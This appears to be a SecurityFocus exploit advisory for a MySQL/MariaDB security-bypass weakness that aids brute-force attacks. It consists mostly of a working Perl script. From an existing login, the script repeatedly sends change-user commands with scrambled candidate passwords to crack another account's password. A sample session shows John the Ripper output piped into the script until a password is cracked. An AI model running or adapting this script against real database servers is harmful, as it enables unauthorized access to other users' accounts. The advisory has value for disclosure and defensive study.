source: https://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
use Net::MySQL;
$|=1;
my $mysql= Net::MySQL->new(hostname=>'192.168.2.3',
database =>'test',
user =>"user",
password =>"secret",
debug =>0,
);$crackuser="crackme";
while(<stdin>){
chomp;$currentpass=$_;$vv=join"\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble($currentpass, $mysql->{salt}, $mysql->{client_capabilities})."\0";if($mysql->_execute_command("\x11", $vv) ne undef){
print "[*] Cracked! --> $currentpass\n";exit;}}
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental--stdout=5| perl mysqlcrack.pl
Warning: MaxLen =8 is too large for the current hash type, reduced to 5
words: 16382time: 0:00:00:02w/s: 6262current: citcH
words: 24573time: 0:00:00:04w/s: 4916current: rap
words: 40956time: 0:00:00:07w/s: 5498current: matc3
words: 49147time: 0:00:00:09w/s: 5030current: 4429
words: 65530time: 0:00:00:12w/s: 5354current: ch141
words: 73721time: 0:00:00:14w/s: 5021current: v3n
words: 90104time: 0:00:00:17w/s: 5277current: pun2
[*] Cracked! --> pass
words: 98295time: 0:00:00:18w/s: 5434current: 43gs
Session aborted
